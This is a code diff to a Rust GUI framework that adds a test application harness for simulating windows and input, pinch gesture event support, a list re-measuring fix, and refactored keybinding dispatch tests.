+ foreground_executor: ForegroundExecutor,
+ #[allow(dead_code)]
+ dispatcher: TestDispatcher,
+ text_system: Arc<TextSystem>,
+}
+
+impl TestApp {
+ /// Create a new test application.
+ pub fn new() -> Self {
+ Self::with_seed(0)
+ }
+
+ /// Create a new test application with a specific random seed.
+ pub fn with_seed(seed: u64) -> Self {
+ Self::build(seed, None, Arc::new(()))
+ }
+
+ /// Create a new test application with a custom text system for real font shaping.
+ pub fn with_text_system(text_system: Arc<dyn PlatformTextSystem>) -> Self {
+ Self::build(0, Some(text_system), Arc::new(()))
+ }
+
+ /// Create a new test application with a custom text system and asset source.
+ pub fn with_text_system_and_assets(
+ text_system: Arc<dyn PlatformTextSystem>,
+ asset_source: Arc<dyn crate::AssetSource>,
+ ) -> Self {
+ Self::build(0, Some(text_system), asset_source)
+ }
+
+ fn build(
+ seed: u64,
+ platform_text_system: Option<Arc<dyn PlatformTextSystem>>,
+ asset_source: Arc<dyn crate::AssetSource>,
+ ) -> Self {
+ let dispatcher = TestDispatcher::new(seed);
+ let arc_dispatcher = Arc::new(dispatcher.clone());
+ let background_executor = BackgroundExecutor::new(arc_dispatcher.clone());
+ let foreground_executor = ForegroundExecutor::new(arc_dispatcher);
+ let platform = match platform_text_system.clone() {
+ Some(ts) => TestPlatform::with_text_system(
+ background_executor.clone(),
+ foreground_executor.clone(),
+ ts,
+ ),
+ None => TestPlatform::new(background_executor.clone(), foreground_executor.clone()),
+ };
+ let http_client = http_client::FakeHttpClient::with_404_response();
+ let text_system = Arc::new(TextSystem::new(
+ platform_text_system.unwrap_or_else(|| platform.text_system.clone()),
+ ));
+
+ let app = App::new_app(platform.clone(), asset_source, http_client);
+ app.borrow_mut().mode = GpuiMode::test();
+
+ Self {
+ app,
+ platform,
+ background_executor,
+ foreground_executor,
+ dispatcher,
+ text_system,
+ }
+ }
+
+ /// Run a closure with mutable access to the App context.
+ /// Automatically runs until parked after the closure completes.
+ pub fn update<R>(&mut self, f: impl FnOnce(&mut App) -> R) -> R {
+ let result = {
+ let mut app = self.app.borrow_mut();
+ app.update(f)
+ };
+ self.run_until_parked();
+ result
+ }
+
+ /// Run a closure with read-only access to the App context.
+ pub fn read<R>(&self, f: impl FnOnce(&App) -> R) -> R {
+ let app = self.app.borrow();
+ f(&app)
+ }
+
+ /// Create a new entity in the app.
+ pub fn new_entity<T: 'static>(
+ &mut self,
+ build: impl FnOnce(&mut Context<T>) -> T,
+ ) -> Entity<T> {
+ self.update(|cx| cx.new(build))
+ }
+
+ /// Update an entity.
+ pub fn update_entity<T: 'static, R>(
+ &mut self,
+ entity: &Entity<T>,
+ f: impl FnOnce(&mut T, &mut Context<T>) -> R,
+ ) -> R {
+ self.update(|cx| entity.update(cx, f))
+ }
+
+ /// Read an entity.
+ pub fn read_entity<T: 'static, R>(
+ &self,
+ entity: &Entity<T>,
+ f: impl FnOnce(&T, &App) -> R,
+ ) -> R {
+ self.read(|cx| f(entity.read(cx), cx))
+ }
+
+ /// Open a test window with the given root view, using maximized bounds.
+ pub fn open_window<V: Render + 'static>(
+ &mut self,
+ build_view: impl FnOnce(&mut Window, &mut Context<V>) -> V,
+ ) -> TestAppWindow<V> {
+ let bounds = self.read(|cx| Bounds::maximized(None, cx));
+ let handle = self.update(|cx| {
+ cx.open_window(
+ WindowOptions {
+ window_bounds: Some(WindowBounds::Windowed(bounds)),
+ ..Default::default()
+ },
+ |window, cx| cx.new(|cx| build_view(window, cx)),
+ )
+ .unwrap()
+ });
+
+ TestAppWindow {
+ handle,
+ app: self.app.clone(),
+ platform: self.platform.clone(),
+ background_executor: self.background_executor.clone(),
+ }
+ }
+
+ /// Open a test window with specific options.
+ pub fn open_window_with_options<V: Render + 'static>(
+ &mut self,
+ options: WindowOptions,
+ build_view: impl FnOnce(&mut Window, &mut Context<V>) -> V,
+ ) -> TestAppWindow<V> {
+ let handle = self.update(|cx| {
+ cx.open_window(options, |window, cx| cx.new(|cx| build_view(window, cx)))
+ .unwrap()
+ });
+
+ TestAppWindow {
+ handle,
+ app: self.app.clone(),
+ platform: self.platform.clone(),
+ background_executor: self.background_executor.clone(),
+ }
+ }
+
+ /// Run pending tasks until there's nothing left to do.
+ pub fn run_until_parked(&self) {
+ self.background_executor.run_until_parked();
+ }
+
+ /// Advance the simulated clock by the given duration.
+ pub fn advance_clock(&self, duration: Duration) {
+ self.background_executor.advance_clock(duration);
+ }
+
+ /// Spawn a future on the foreground executor.
+ pub fn spawn<Fut, R>(&self, f: impl FnOnce(AsyncApp) -> Fut) -> Task<R>
+ where
+ Fut: Future<Output = R> + 'static,
+ R: 'static,
+ {
+ self.foreground_executor.spawn(f(self.to_async()))
+ }
+
+ /// Spawn a future on the background executor.
+ pub fn background_spawn<R>(&self, future: impl Future<Output = R> + Send + 'static) -> Task<R>
+ where
+ R: Send + 'static,
+ {
+ self.background_executor.spawn(future)
+ }
+
+ /// Get an async handle to the app.
+ pub fn to_async(&self) -> AsyncApp {
+ AsyncApp {
+ app: Rc::downgrade(&self.app),
+ background_executor: self.background_executor.clone(),
+ foreground_executor: self.foreground_executor.clone(),
+ }
+ }
+
+ /// Get the background executor.
+ pub fn background_executor(&self) -> &BackgroundExecutor {
+ &self.background_executor
+ }
+
+ /// Get the foreground executor.
+ pub fn foreground_executor(&self) -> &ForegroundExecutor {
+ &self.foreground_executor
+ }
+
+ /// Get the text system.
+ pub fn text_system(&self) -> &Arc<TextSystem> {
+ &self.text_system
+ }
+
+ /// Check if a global of the given type exists.
+ pub fn has_global<G: Global>(&self) -> bool {
+ self.read(|cx| cx.has_global::<G>())
+ }
+
+ /// Set a global value.
+ pub fn set_global<G: Global>(&mut self, global: G) {
+ self.update(|cx| cx.set_global(global));
+ }
+
+ /// Read a global value.
+ pub fn read_global<G: Global, R>(&self, f: impl FnOnce(&G, &App) -> R) -> R {
+ self.read(|cx| f(cx.global(), cx))
+ }
+
+ /// Update a global value.
+ pub fn update_global<G: Global, R>(&mut self, f: impl FnOnce(&mut G, &mut App) -> R) -> R {
+ self.update(|cx| cx.update_global(f))
+ }
+
+ // Platform simulation methods
+
+ /// Write text to the simulated clipboard.
+ pub fn write_to_clipboard(&self, item: ClipboardItem) {
+ self.platform.write_to_clipboard(item);
+ }
+
+ /// Read from the simulated clipboard.
+ pub fn read_from_clipboard(&self) -> Option<ClipboardItem> {
+ self.platform.read_from_clipboard()
+ }
+
+ /// Get URLs that have been opened via `cx.open_url()`.
+ pub fn opened_url(&self) -> Option<String> {
+ self.platform.opened_url.borrow().clone()
+ }
+
+ /// Check if a file path prompt is pending.
+ pub fn did_prompt_for_new_path(&self) -> bool {
+ self.platform.did_prompt_for_new_path()
+ }
+
+ /// Simulate answering a path selection dialog.
+ pub fn simulate_new_path_selection(
+ &self,
+ select: impl FnOnce(&std::path::Path) -> Option<std::path::PathBuf>,
+ ) {
+ self.platform.simulate_new_path_selection(select);
+ }
+
+ /// Check if a prompt dialog is pending.
+ pub fn has_pending_prompt(&self) -> bool {
+ self.platform.has_pending_prompt()
+ }
+
+ /// Simulate answering a prompt dialog.
+ pub fn simulate_prompt_answer(&self, button: &str) {
+ self.platform.simulate_prompt_answer(button);
+ }
+
+ /// Get all open windows.
+ pub fn windows(&self) -> Vec<AnyWindowHandle> {
+ self.read(|cx| cx.windows())
+ }
+}
+
+impl Default for TestApp {
+ fn default() -> Self {
+ Self::new()
+ }
+}
+
+/// A test window with inspection and simulation capabilities.
+pub struct TestAppWindow<V> {
+ handle: WindowHandle<V>,
+ app: Rc<AppCell>,
+ platform: Rc<TestPlatform>,
+ background_executor: BackgroundExecutor,
+}
+
+impl<V: 'static + Render> TestAppWindow<V> {
+ /// Get the window handle.
+ pub fn handle(&self) -> WindowHandle<V> {
+ self.handle
+ }
+
+ /// Get the root view entity.
+ pub fn root(&self) -> Entity<V> {
+ let mut app = self.app.borrow_mut();
+ let any_handle: AnyWindowHandle = self.handle.into();
+ app.update_window(any_handle, |root_view, _, _| {
+ root_view.downcast::<V>().expect("root view type mismatch")
+ })
+ .expect("window not found")
+ }
+
+ /// Update the root view.
+ pub fn update<R>(&mut self, f: impl FnOnce(&mut V, &mut Window, &mut Context<V>) -> R) -> R {
+ let result = {
+ let mut app = self.app.borrow_mut();
+ let any_handle: AnyWindowHandle = self.handle.into();
+ app.update_window(any_handle, |root_view, window, cx| {
+ let view = root_view.downcast::<V>().expect("root view type mismatch");
+ view.update(cx, |view, cx| f(view, window, cx))
+ })
+ .expect("window not found")
+ };
+ self.background_executor.run_until_parked();
+ result
+ }
+
+ /// Read the root view.
+ pub fn read<R>(&self, f: impl FnOnce(&V, &App) -> R) -> R {
+ let app = self.app.borrow();
+ let view = self
+ .app
+ .borrow()
+ .windows
+ .get(self.handle.window_id())
+ .and_then(|w| w.as_ref())
+ .and_then(|w| w.root.clone())
+ .and_then(|r| r.downcast::<V>().ok())
+ .expect("window or root view not found");
+ f(view.read(&app), &app)
+ }
+
+ /// Get the window title.
+ pub fn title(&self) -> Option<String> {
+ let app = self.app.borrow();
+ app.read_window(&self.handle, |_, _cx| {
+ // TODO: expose title through Window API
+ None
+ })
+ .unwrap()
+ }
+
+ /// Simulate a keystroke.
+ pub fn simulate_keystroke(&mut self, keystroke: &str) {
+ let keystroke = Keystroke::parse(keystroke).unwrap();
+ {
+ let mut app = self.app.borrow_mut();
+ let any_handle: AnyWindowHandle = self.handle.into();
+ app.update_window(any_handle, |_, window, cx| {
+ window.dispatch_keystroke(keystroke, cx);
+ })
+ .unwrap();
+ }
+ self.background_executor.run_until_parked();
+ }
+
+ /// Simulate multiple keystrokes (space-separated).
+ pub fn simulate_keystrokes(&mut self, keystrokes: &str) {
+ for keystroke in keystrokes.split(' ') {
+ self.simulate_keystroke(keystroke);
+ }
+ }
+
+ /// Simulate typing text by dispatching each character as an individual keystroke.
+ pub fn simulate_input(&mut self, input: &str) {
+ for char in input.chars() {
+ self.simulate_keystroke(&char.to_string());
+ }
+ }
+
+ /// Simulate a mouse move.
+ pub fn simulate_mouse_move(&mut self, position: Point<Pixels>) {
+ self.simulate_event(MouseMoveEvent {
+ position,
+ modifiers: Default::default(),
+ pressed_button: None,
+ });
+ }
+
+ /// Simulate a mouse down event.
+ pub fn simulate_mouse_down(&mut self, position: Point<Pixels>, button: MouseButton) {
+ self.simulate_event(MouseDownEvent {
+ position,
+ button,
+ modifiers: Default::default(),
+ click_count: 1,
+ first_mouse: false,
+ });
+ }
+
+ /// Simulate a mouse up event.
+ pub fn simulate_mouse_up(&mut self, position: Point<Pixels>, button: MouseButton) {
+ self.simulate_event(MouseUpEvent {
+ position,
+ button,
+ modifiers: Default::default(),
+ click_count: 1,
+ });
+ }
+
+ /// Simulate a click at the given position.
+ pub fn simulate_click(&mut self, position: Point<Pixels>, button: MouseButton) {
+ self.simulate_mouse_down(position, button);
+ self.simulate_mouse_up(position, button);
+ }
+
+ /// Simulate a scroll event.
+ pub fn simulate_scroll(&mut self, position: Point<Pixels>, delta: Point<Pixels>) {
+ self.simulate_event(crate::ScrollWheelEvent {
+ position,
+ delta: crate::ScrollDelta::Pixels(delta),
+ modifiers: Default::default(),
+ touch_phase: crate::TouchPhase::Moved,
+ });
+ }
+
+ /// Simulate an input event.
+ pub fn simulate_event<E: InputEvent>(&mut self, event: E) {
+ let platform_input = event.to_platform_input();
+ {
+ let mut app = self.app.borrow_mut();
+ let any_handle: AnyWindowHandle = self.handle.into();
+ app.update_window(any_handle, |_, window, cx| {
+ window.dispatch_event(platform_input, cx);
+ })
+ .unwrap();
+ }
+ self.background_executor.run_until_parked();
+ }
+
+ /// Simulate resizing the window.
+ pub fn simulate_resize(&mut self, size: Size<Pixels>) {
+ let window_id = self.handle.window_id();
+ let mut app = self.app.borrow_mut();
+ if let Some(Some(window)) = app.windows.get_mut(window_id) {
+ if let Some(test_window) = window.platform_window.as_test() {
+ test_window.simulate_resize(size);
+ }
+ }
+ drop(app);
+ self.background_executor.run_until_parked();
+ }
+
+ /// Force a redraw of the window.
+ pub fn draw(&mut self) {
+ let mut app = self.app.borrow_mut();
+ let any_handle: AnyWindowHandle = self.handle.into();
+ app.update_window(any_handle, |_, window, cx| {
+ window.draw(cx).clear();
+ })
+ .unwrap();
+ }
+}
+
+impl<V> Clone for TestAppWindow<V> {
+ fn clone(&self) -> Self {
+ Self {
+ handle: self.handle,
+ app: self.app.clone(),
+ platform: self.platform.clone(),
+ background_executor: self.background_executor.clone(),
+ }
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::{FocusHandle, Focusable, div, prelude::*};
+
+ struct Counter {
+ count: usize,
+ focus_handle: FocusHandle,
+ }
+
+ impl Counter {
+ fn new(_window: &mut Window, cx: &mut Context<Self>) -> Self {
+ let focus_handle = cx.focus_handle();
+ Self {
+ count: 0,
+ focus_handle,
+ }
+ }
+
+ fn increment(&mut self, _cx: &mut Context<Self>) {
+ self.count += 1;
+ }
+ }
+
+ impl Focusable for Counter {
+ fn focus_handle(&self, _cx: &App) -> FocusHandle {
+ self.focus_handle.clone()
+ }
+ }
+
+ impl Render for Counter {
+ fn render(&mut self, _window: &mut Window, _cx: &mut Context<Self>) -> impl IntoElement {
+ div().child(format!("Count: {}", self.count))
+ }
+ }
+
+ #[test]
+ fn test_basic_usage() {
+ let mut app = TestApp::new();
+
+ let mut window = app.open_window(Counter::new);
+
+ window.update(|counter, _window, cx| {
+ counter.increment(cx);
+ });
+
+ window.read(|counter, _| {
+ assert_eq!(counter.count, 1);
+ });
+
+ drop(window);
+ app.update(|cx| cx.shutdown());
+ }
+
+ #[test]
+ fn test_entity_creation() {
+ let mut app = TestApp::new();
+
+ let entity = app.new_entity(|cx| Counter {
+ count: 42,
+ focus_handle: cx.focus_handle(),
+ });
+
+ app.read_entity(&entity, |counter, _| {
+ assert_eq!(counter.count, 42);
+ });
+
+ app.update_entity(&entity, |counter, _cx| {
+ counter.count += 1;
+ });
+
+ app.read_entity(&entity, |counter, _| {
+ assert_eq!(counter.count, 43);
+ });
+ }
+
+ #[test]
+ fn test_globals() {
+ let mut app = TestApp::new();
+
+ struct MyGlobal(String);
+ impl Global for MyGlobal {}
+
+ assert!(!app.has_global::<MyGlobal>());
+
+ app.set_global(MyGlobal("hello".into()));
+
+ assert!(app.has_global::<MyGlobal>());
+
+ app.read_global::<MyGlobal, _>(|global, _| {
+ assert_eq!(global.0, "hello");
+ });
+
+ app.update_global::<MyGlobal, _>(|global, _| {
+ global.0 = "world".into();
+ });
+
+ app.read_global::<MyGlobal, _>(|global, _| {
+ assert_eq!(global.0, "world");
+ });
+ }
+}
@@ -22,7 +22,8 @@ pub struct TestAppContext {
pub background_executor: BackgroundExecutor,
#[doc(hidden)]
pub foreground_executor: ForegroundExecutor,
- dispatcher: TestDispatcher,
+ #[doc(hidden)]
+ pub dispatcher: TestDispatcher,
test_platform: Rc<TestPlatform>,
text_system: Arc<TextSystem>,
fn_name: Option<&'static str>,
@@ -231,6 +232,33 @@ impl TestAppContext {
.unwrap()
}
+ /// Opens a new window with a specific size.
+ ///
+ /// Unlike `add_window`, which uses maximized bounds, this allows controlling
+ /// the window dimensions, which is important for layout-sensitive tests.
+ pub fn open_window<F, V>(
+ &mut self,
+ window_size: Size<Pixels>,
+ build_window: F,
+ ) -> WindowHandle<V>
+ where
+ F: FnOnce(&mut Window, &mut Context<V>) -> V,
+ V: 'static + Render,
+ {
+ let mut cx = self.app.borrow_mut();
+ cx.open_window(
+ WindowOptions {
+ window_bounds: Some(WindowBounds::Windowed(Bounds {
+ origin: Point::default(),
+ size: window_size,
+ })),
+ ..Default::default()
+ },
+ |window, cx| cx.new(|cx| build_window(window, cx)),
+ )
+ .unwrap()
+ }
+
/// Adds a new window with no content.
pub fn add_empty_window(&mut self) -> &mut VisualTestContext {
let mut cx = self.app.borrow_mut();
@@ -820,6 +820,15 @@ impl LinearColorStop {
}
impl Background {
+ /// Returns the solid color if this is a solid background, or `None` otherwise.
+ pub fn as_solid(&self) -> Option<Hsla> {
+ if self.tag == BackgroundTag::Solid {
+ Some(self.solid)
+ } else {
+ None
+ }
+ }
+
/// Use specified color space for color interpolation.
///
/// <https://developer.mozilla.org/en-US/docs/Web/CSS/color-interpolation-method>
@@ -15,6 +15,8 @@
//! and Tailwind-like styling that you can use to build your own custom elements. Div is
//! constructed by combining these two systems into an all-in-one element.
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+use crate::PinchEvent;
use crate::{
AbsoluteLength, Action, AnyDrag, AnyElement, AnyTooltip, AnyView, App, Bounds, ClickEvent,
DispatchPhase, Display, Element, ElementId, Entity, FocusHandle, Global, GlobalElementId,
@@ -353,6 +355,43 @@ impl Interactivity {
}));
}
+ /// Bind the given callback to pinch gesture events during the bubble phase.
+ ///
+ /// Note: This event is only available on macOS and Wayland (Linux).
+ /// On Windows, pinch gestures are simulated as scroll wheel events with Ctrl held.
+ ///
+ /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback.
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ pub fn on_pinch(&mut self, listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static) {
+ self.pinch_listeners
+ .push(Box::new(move |event, phase, hitbox, window, cx| {
+ if phase == DispatchPhase::Bubble && hitbox.is_hovered(window) {
+ (listener)(event, window, cx);
+ }
+ }));
+ }
+
+ /// Bind the given callback to pinch gesture events during the capture phase.
+ ///
+ /// Note: This event is only available on macOS and Wayland (Linux).
+ /// On Windows, pinch gestures are simulated as scroll wheel events with Ctrl held.
+ ///
+ /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback.
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ pub fn capture_pinch(
+ &mut self,
+ listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static,
+ ) {
+ self.pinch_listeners
+ .push(Box::new(move |event, phase, _hitbox, window, cx| {
+ if phase == DispatchPhase::Capture {
+ (listener)(event, window, cx);
+ } else {
+ cx.propagate();
+ }
+ }));
+ }
+
/// Bind the given callback to an action dispatch during the capture phase.
/// The imperative API equivalent to [`InteractiveElement::capture_action`].
///
@@ -635,6 +674,16 @@ impl Interactivity {
pub fn block_mouse_except_scroll(&mut self) {
self.hitbox_behavior = HitboxBehavior::BlockMouseExceptScroll;
}
+
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ fn has_pinch_listeners(&self) -> bool {
+ !self.pinch_listeners.is_empty()
+ }
+
+ #[cfg(not(any(target_os = "linux", target_os = "macos")))]
+ fn has_pinch_listeners(&self) -> bool {
+ false
+ }
}
/// A trait for elements that want to use the standard GPUI event handlers that don't
@@ -905,6 +954,34 @@ pub trait InteractiveElement: Sized {
self
}
+ /// Bind the given callback to pinch gesture events during the bubble phase.
+ /// The fluent API equivalent to [`Interactivity::on_pinch`].
+ ///
+ /// Note: This event is only available on macOS and Wayland (Linux).
+ /// On Windows, pinch gestures are simulated as scroll wheel events with Ctrl held.
+ ///
+ /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback.
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ fn on_pinch(mut self, listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static) -> Self {
+ self.interactivity().on_pinch(listener);
+ self
+ }
+
+ /// Bind the given callback to pinch gesture events during the capture phase.
+ /// The fluent API equivalent to [`Interactivity::capture_pinch`].
+ ///
+ /// Note: This event is only available on macOS and Wayland (Linux).
+ /// On Windows, pinch gestures are simulated as scroll wheel events with Ctrl held.
+ ///
+ /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback.
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ fn capture_pinch(
+ mut self,
+ listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static,
+ ) -> Self {
+ self.interactivity().capture_pinch(listener);
+ self
+ }
/// Capture the given action, before normal action dispatch can fire.
/// The fluent API equivalent to [`Interactivity::capture_action`].
///
@@ -1290,6 +1367,10 @@ pub(crate) type MouseMoveListener =
pub(crate) type ScrollWheelListener =
Box<dyn Fn(&ScrollWheelEvent, DispatchPhase, &Hitbox, &mut Window, &mut App) + 'static>;
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+pub(crate) type PinchListener =
+ Box<dyn Fn(&PinchEvent, DispatchPhase, &Hitbox, &mut Window, &mut App) + 'static>;
+
pub(crate) type ClickListener = Rc<dyn Fn(&ClickEvent, &mut Window, &mut App) + 'static>;
pub(crate) type DragListener =
@@ -1644,6 +1725,8 @@ pub struct Interactivity {
pub(crate) mouse_pressure_listeners: Vec<MousePressureListener>,
pub(crate) mouse_move_listeners: Vec<MouseMoveListener>,
pub(crate) scroll_wheel_listeners: Vec<ScrollWheelListener>,
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ pub(crate) pinch_listeners: Vec<PinchListener>,
pub(crate) key_down_listeners: Vec<KeyDownListener>,
pub(crate) key_up_listeners: Vec<KeyUpListener>,
pub(crate) modifiers_changed_listeners: Vec<ModifiersChangedListener>,
@@ -1847,6 +1930,7 @@ impl Interactivity {
|| !self.click_listeners.is_empty()
|| !self.aux_click_listeners.is_empty()
|| !self.scroll_wheel_listeners.is_empty()
+ || self.has_pinch_listeners()
|| self.drag_listener.is_some()
|| !self.drop_listeners.is_empty()
|| self.tooltip_builder.is_some()
@@ -2213,6 +2297,14 @@ impl Interactivity {
})
}
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ for listener in self.pinch_listeners.drain(..) {
+ let hitbox = hitbox.clone();
+ window.on_mouse_event(move |event: &PinchEvent, phase, window, cx| {
+ listener(event, phase, &hitbox, window, cx);
+ })
+ }
+
if self.hover_style.is_some()
|| self.base_style.mouse_cursor.is_some()
|| cx.active_drag.is_some() && !self.drag_over_styles.is_empty()
@@ -2497,7 +2589,8 @@ impl Interactivity {
let pending_mouse_down = pending_mouse_down.clone();
let source_bounds = hitbox.bounds;
move |window: &Window| {
- pending_mouse_down.borrow().is_none()
+ !window.last_input_was_keyboard()
+ && pending_mouse_down.borrow().is_none()
&& source_bounds.contains(&window.mouse_position())
}
});
@@ -1103,6 +1103,7 @@ impl Element for List {
);
state.items = new_items;
+ state.measuring_behavior.reset();
}
let padding = style
@@ -1348,6 +1349,41 @@ mod test {
assert_eq!(offset.offset_in_item, px(0.));
}
+ #[gpui::test]
+ fn test_measure_all_after_width_change(cx: &mut TestAppContext) {
+ let cx = cx.add_empty_window();
+
+ let state = ListState::new(10, crate::ListAlignment::Top, px(0.)).measure_all();
+
+ struct TestView(ListState);
+ impl Render for TestView {
+ fn render(&mut self, _: &mut Window, _: &mut Context<Self>) -> impl IntoElement {
+ list(self.0.clone(), |_, _, _| {
+ div().h(px(50.)).w_full().into_any()
+ })
+ .w_full()
+ .h_full()
+ }
+ }
+
+ let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone())));
+
+ // First draw at width 100: all 10 items measured (total 500px).
+ // Viewport is 200px, so max scroll offset should be 300px.
+ cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| {
+ view.clone().into_any_element()
+ });
+ assert_eq!(state.max_offset_for_scrollbar().y, px(300.));
+
+ // Second draw at a different width: items get invalidated.
+ // Without the fix, max_offset would drop because unmeasured items
+ // contribute 0 height.
+ cx.draw(point(px(0.), px(0.)), size(px(200.), px(200.)), |_, _| {
+ view.into_any_element()
+ });
+ assert_eq!(state.max_offset_for_scrollbar().y, px(300.));
+ }
+
#[gpui::test]
fn test_remeasure(cx: &mut TestAppContext) {
let cx = cx.add_empty_window();
@@ -129,6 +129,13 @@ impl BackgroundExecutor {
}
}
+ /// Returns the underlying scheduler::BackgroundExecutor.
+ ///
+ /// This is used to pass the executor to thread/worktree code.
+ pub fn scheduler_executor(&self) -> scheduler::BackgroundExecutor {
+ self.inner.clone()
+ }
+
/// Enqueues the given future to be run to completion on a background thread.
#[track_caller]
pub fn spawn<R>(&self, future: impl Future<Output = R> + Send + 'static) -> Task<R>
@@ -17,6 +17,9 @@ pub trait KeyEvent: InputEvent {}
/// A mouse event from the platform.
pub trait MouseEvent: InputEvent {}
+/// A gesture event from the platform.
+pub trait GestureEvent: InputEvent {}
+
/// The key down event equivalent for the platform.
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct KeyDownEvent {
@@ -467,6 +470,51 @@ impl Default for ScrollDelta {
}
}
+/// A pinch gesture event from the platform, generated when the user performs
+/// a pinch-to-zoom gesture (typically on a trackpad).
+///
+/// Note: This event is only available on macOS and Wayland (Linux).
+/// On Windows, pinch gestures are simulated as scroll wheel events with Ctrl held.
+#[derive(Clone, Debug, Default)]
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+pub struct PinchEvent {
+ /// The position of the pinch center on the window.
+ pub position: Point<Pixels>,
+
+ /// The zoom delta for this event.
+ /// Positive values indicate zooming in, negative values indicate zooming out.
+ /// For example, 0.1 represents a 10% zoom increase.
+ pub delta: f32,
+
+ /// The modifiers that were held down during the pinch gesture.
+ pub modifiers: Modifiers,
+
+ /// The phase of the pinch gesture.
+ pub phase: TouchPhase,
+}
+
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+impl Sealed for PinchEvent {}
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+impl InputEvent for PinchEvent {
+ fn to_platform_input(self) -> PlatformInput {
+ PlatformInput::Pinch(self)
+ }
+}
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+impl GestureEvent for PinchEvent {}
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+impl MouseEvent for PinchEvent {}
+
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+impl Deref for PinchEvent {
+ type Target = Modifiers;
+
+ fn deref(&self) -> &Self::Target {
+ &self.modifiers
+ }
+}
+
impl ScrollDelta {
/// Returns true if this is a precise scroll delta in pixels.
pub fn precise(&self) -> bool {
@@ -626,6 +674,9 @@ pub enum PlatformInput {
MouseExited(MouseExitEvent),
/// The scroll wheel was used.
ScrollWheel(ScrollWheelEvent),
+ /// A pinch gesture was performed.
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ Pinch(PinchEvent),
/// Files were dragged and dropped onto the window.
FileDrop(FileDropEvent),
}
@@ -642,6 +693,8 @@ impl PlatformInput {
PlatformInput::MousePressure(event) => Some(event),
PlatformInput::MouseExited(event) => Some(event),
PlatformInput::ScrollWheel(event) => Some(event),
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ PlatformInput::Pinch(event) => Some(event),
PlatformInput::FileDrop(event) => Some(event),
}
}
@@ -657,6 +710,8 @@ impl PlatformInput {
PlatformInput::MousePressure(_) => None,
PlatformInput::MouseExited(_) => None,
PlatformInput::ScrollWheel(_) => None,
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ PlatformInput::Pinch(_) => None,
PlatformInput::FileDrop(_) => None,
}
}
@@ -629,66 +629,99 @@ mod tests {
use std::{cell::RefCell, ops::Range, rc::Rc};
use crate::{
- Action, ActionRegistry, App, Bounds, Context, DispatchTree, FocusHandle, InputHandler,
- IntoElement, KeyBinding, KeyContext, Keymap, Pixels, Point, Render, Subscription,
- TestAppContext, UTF16Selection, Window,
+ ActionRegistry, App, Bounds, Context, DispatchTree, FocusHandle, InputHandler, IntoElement,
+ KeyBinding, KeyContext, Keymap, Pixels, Point, Render, Subscription, TestAppContext,
+ UTF16Selection, Unbind, Window,
};
- #[derive(PartialEq, Eq)]
- struct TestAction;
+ actions!(dispatch_test, [TestAction, SecondaryTestAction]);
- impl Action for TestAction {
- fn name(&self) -> &'static str {
- "test::TestAction"
- }
-
- fn name_for_type() -> &'static str
- where
- Self: ::std::marker::Sized,
- {
- "test::TestAction"
- }
-
- fn partial_eq(&self, action: &dyn Action) -> bool {
- action.as_any().downcast_ref::<Self>() == Some(self)
- }
-
- fn boxed_clone(&self) -> std::boxed::Box<dyn Action> {
- Box::new(TestAction)
- }
+ fn test_dispatch_tree(bindings: Vec<KeyBinding>) -> DispatchTree {
+ let registry = ActionRegistry::default();
- fn build(_value: serde_json::Value) -> anyhow::Result<Box<dyn Action>>
- where
- Self: Sized,
- {
- Ok(Box::new(TestAction))
- }
+ DispatchTree::new(
+ Rc::new(RefCell::new(Keymap::new(bindings))),
+ Rc::new(registry),
+ )
}
#[test]
fn test_keybinding_for_action_bounds() {
- let keymap = Keymap::new(vec![KeyBinding::new(
+ let tree = test_dispatch_tree(vec![KeyBinding::new(
"cmd-n",
TestAction,
Some("ProjectPanel"),
)]);
- let mut registry = ActionRegistry::default();
+ let contexts = vec![
+ KeyContext::parse("Workspace").unwrap(),
+ KeyContext::parse("ProjectPanel").unwrap(),
+ ];
+
+ let keybinding = tree.bindings_for_action(&TestAction, &contexts);
+
+ assert!(keybinding[0].action.partial_eq(&TestAction))
+ }
+
+ #[test]
+ fn test_bindings_for_action_hides_targeted_unbind_in_active_context() {
+ let tree = test_dispatch_tree(vec![
+ KeyBinding::new("tab", TestAction, Some("Editor")),
+ KeyBinding::new(
+ "tab",
+ Unbind("dispatch_test::TestAction".into()),
+ Some("Editor && edit_prediction"),
+ ),
+ KeyBinding::new(
+ "tab",
+ SecondaryTestAction,
+ Some("Editor && showing_completions"),
+ ),
+ ]);
+
+ let contexts = vec![
+ KeyContext::parse("Workspace").unwrap(),
+ KeyContext::parse("Editor showing_completions edit_prediction").unwrap(),
+ ];
- registry.load_action::<TestAction>();
+ let bindings = tree.bindings_for_action(&TestAction, &contexts);
+ assert!(bindings.is_empty());
- let keymap = Rc::new(RefCell::new(keymap));
+ let highest = tree.highest_precedence_binding_for_action(&TestAction, &contexts);
+ assert!(highest.is_none());
+
+ let fallback_bindings = tree.bindings_for_action(&SecondaryTestAction, &contexts);
+ assert_eq!(fallback_bindings.len(), 1);
